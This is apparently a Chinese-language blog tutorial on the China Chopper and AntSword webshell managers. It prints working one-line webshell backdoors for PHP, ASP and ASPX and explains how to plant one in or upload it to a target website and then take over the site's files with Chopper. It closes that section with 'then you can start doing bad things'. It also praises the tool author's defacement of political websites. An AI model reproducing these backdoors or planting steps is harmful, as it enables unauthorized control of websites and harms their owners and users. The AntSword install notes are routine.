WEB渗透工具测试之中国菜刀、中国蚁剑

中国菜刀的由来：

说起菜刀，就不得不提起菜刀的作者，作者是一个退伍军人，生长在一个贫穷的农村，据说初中也没读完，英语更是不咋地，但他却自学掌握了C++/J2ME/PHP/JSP/ASP.NET等等十数种计算机语言，当初在六七年前台湾闹独立的时候，他在国民党和民进党的网站上留下了“只有一个中国”的黑页，一举成名。

作者是一个朴实，低调的技术牛人，他这些年留下的作品很多，中国菜刀是他最新的一个作品，从他之前的作品WEBSHELL管理器的基础上修改而来，功能更加的强大。

中国菜刀是一款专业的网站管理软件，用途广泛，使用方便，小巧实用。只要支持动态脚本的网站，都可以用中国菜刀来进行管理！程序大小：214K，在非简体中文环境下使用，自动切换到英文界面。UINCODE方式编译，支持多国语言输入显示

主要功能有：文件管理，虚拟终端，数据库管理。

1. 文件管理：[特色]缓存下载目录，并支持离线查看缓存目录;

2.虚拟终端：[特色]人性化的设计，操作方便;(输入HELP查看更多用法)

3.数据库管理：[特色]图形界面,支持YSQL,MSSQL,ORACLE,INFOMIX,ACCESS

以入支持ADO方式连接的数据库。

只要往目标网站中加入一句话木马，然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。

什么是一句话木马？

一句话木马就是一句简单的脚本语言，常见脚本语言的一句话木马如下：

php：<?php @eval($_post['pass']);?>

asp：<%eval request ("pass")%>

aspx：<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

 

一句话木马的使用

以php一句话为例，我们可以直接将这些语句插入到网站的某个php文件上，或者直接创建一个新的文件，在文件里写入一句话木马，然后把文件上传到网站上即可。

 

 

 我们把这个phpma.php上传上去后，打开中国菜刀，在空白处鼠标右键，选择“添加选项”

 

 编辑相关参数，包括一句话木马所在的URL以及密码，最后点击“编辑” 。

 

 在URL中选中目标网站，点击鼠标右键，选择“文件管理”，就能看到网站的目录结构了 。

 

 获取整个网站的目录，然后就可以开始做坏事了。

 

 

中国蚁剑是一款开源的跨平台网站管理工具，它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

中国菜刀已经面世了5年以上，伴随着多少年轻一代的网络安全爱好者们走过了一度又一度的岁月，在我看来，仍是当今世面上最好用甚至最无可替代的一款网站管理工具。虽然很多经过改造复制加强留彩蛋的后来者层出不穷，但仍无法改变它在我心中的地位，包括本次将要介绍的中国蚁剑。

开源代码 https://github.com/antoor/antSword.git

安装模块

$ npm install

编译源码

$ npm run build

启动应用

$ npm start

安装模块速度太慢，中途终止后执行出错？

安装electron-prebuilt模块过程中会自动下载electron程序，由于网络原因下载速度会较慢，此时不要终止结束安装，如若不小心在没下载完成之前Ctrl+C结束掉了安装脚本，那只需要重新npm uninstall electron-prebuilt卸载此模块在重新安装即可。